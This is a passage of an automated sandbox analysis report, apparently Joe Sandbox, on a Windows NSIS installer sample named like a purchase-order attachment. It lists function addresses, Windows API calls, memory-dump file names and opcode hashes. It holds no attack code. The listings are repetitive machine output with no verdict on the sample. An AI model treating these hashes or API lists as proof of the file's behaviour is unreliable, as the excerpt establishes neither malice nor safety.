                                                • Instruction Fuzzy Hash: 41014F70640208BBEF209F60DD49FEE3B69BB04345F008039FA02A51D0DBB99A559F58
                                                Function 00402975 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                • String ID:
                                                • API String ID: 2667972263-0
                                                • Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                • Instruction ID: 30dd54c89a4cddf194586c2a2fc5346a944fd6f702074eaf72055d986495362b
                                                • Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                • Instruction Fuzzy Hash: 0C31B171D00128BBCF21AFA5DE49D9E7E79AF44324F20423AF415762E1CB798D418FA8
                                                Function 00402ECE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: CloseEnum$DeleteValue
                                                • String ID:
                                                • API String ID: 1354259210-0
                                                • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                • Instruction ID: d442e96e729bea3163a88d870f4d25619929b9fa7009ff0cba57fd90435ded5e
                                                • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                • Instruction Fuzzy Hash: 8B212A7150010ABFDF129F94CE89EEF7A7DEB54388F110076B909B21A0D7B58E54AA68
                                                Function 00401DA6 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                • GetClientRect.USER32(?,?), ref: 00401E0A
                                                • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
                                                • Instruction ID: eb17948d85696e98a42b5b2e026cdebc0bad80675354e43e8e08d2e827efe14e
                                                • Opcode Fuzzy Hash: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
                                                • Instruction Fuzzy Hash: 94213B72D00119AFCB05DF98DE45AEEBBB5EB08300F14003AF945F62A0D7349D81DB98
                                                Function 00401C68 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                                • Instruction ID: 7915d77c0e8d2f35ba529c4d8f0c1bf85837a2641dbb4ead1ffb962ccc12b17a
                                                • Opcode Fuzzy Hash: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                                • Instruction Fuzzy Hash: CC218071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF505B61D0D7B88941DB98
                                                Function 00404D6D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
                                                • wsprintfW.USER32 ref: 00404E17
                                                • SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s
                                                • API String ID: 3540041739-3551169577
                                                • Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                • Instruction ID: 531ff4d773969165704d770d32cd75e70745a6e311be36c98e560407ed735fca
                                                • Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                • Instruction Fuzzy Hash: 1711EB73A0422837DB0056ADAC46E9E3698DF85374F250237FA66F21D5D978CC2142D8
                                                Function 00405F18 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                  • Part of subcall function 00405EBB: CharNextW.USER32(?,?,00425710,?,00405F2F,00425710,00425710, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO. A-72 9234567.exe"), ref: 00405EC9
                                                  • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
                                                  • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6
                                                • lstrlenW.KERNEL32(00425710,00000000,00425710,00425710, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO. A-72 9234567.exe"), ref: 00405F71
                                                • GetFileAttributesW.KERNEL32(00425710,00425710,00425710,00425710,00425710,00425710,00000000,00425710,00425710, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 00405F81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                • String ID: 4#v$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 3248276644-3758603893
                                                • Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                • Instruction ID: 8289fae0aeb6f8c8bb33a18b648b52325edb3dacd4d1dfbf908f72671121fed4
                                                • Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                • Instruction Fuzzy Hash: 5EF0F435115E6326E722373A5C49AAF1A04CEC6324B59053BF8A5B22C1DF3C8D5389BE
                                                Function 00405E10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403509,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E16
                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403509,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E20
                                                • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E32
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E10
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2659869361-3936084776
                                                • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                • Instruction ID: 6241345b1480893618f3385b5901a002ffa6f457481071e3b6de6f74fd74f6f8
                                                • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                • Instruction Fuzzy Hash: 00D05E71101634AAC2117B48AC08CDF62AC9E46344341402AF141B20A5C7785A5186ED
                                                Function 0040303E Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                Download Yara Rule
                                                APIs
                                                • DestroyWindow.USER32(00000000,00000000,0040321C,00000001), ref: 00403051
                                                • GetTickCount.KERNEL32 ref: 0040306F
                                                • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
                                                • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                • String ID:
                                                • API String ID: 2102729457-0
                                                • Opcode ID: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
                                                • Instruction ID: 1fe6cbc8f6a725ad0ac4e372fd1d3cf1f1d396d39c9c490f6de0fad46aa3fa9f
                                                • Opcode Fuzzy Hash: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
                                                • Instruction Fuzzy Hash: 1CF05431602621ABC6316F54FD08A9B7BA9FB44B13F41087AF045B11A9CB7948828B9C
                                                Function 0040553A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00405569
                                                • CallWindowProcW.USER32(?,?,?,?), ref: 004055BA
                                                  • Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                • Instruction ID: e9ac82e17096a71ceb81da4f6da7be56a9305aae285fff99253fdd5fe3b389a1
                                                • Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                • Instruction Fuzzy Hash: 6B017171200609BFDF315F11DD84AAB3A66FB84754F100037FA00B51E5C7BA8D52AE69
                                                Function 0040640F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406680,80000002), ref: 00406455
                                                • RegCloseKey.ADVAPI32(?), ref: 00406460
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue
                                                • String ID: : Completed
                                                • API String ID: 3356406503-2954849223
                                                • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                • Instruction ID: ab0cc6cc405738cc07c99bf25685dc2411b0540f073fb059e05756a610da7e73
                                                • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                • Instruction Fuzzy Hash: 4F015E72510209AADF218F51CC05EDB3BA8EB54354F01403AFD5992150D738D968DB94
                                                Function 00403B7E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • FreeLibrary.KERNEL32(?,76233420,00000000,C:\Users\user\AppData\Local\Temp\,00403B56,00403A6C,?,?,00000008,0000000A,0000000C), ref: 00403B98
                                                • GlobalFree.KERNEL32(00000000), ref: 00403B9F
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B7E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: Free$GlobalLibrary
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 1100898210-3936084776
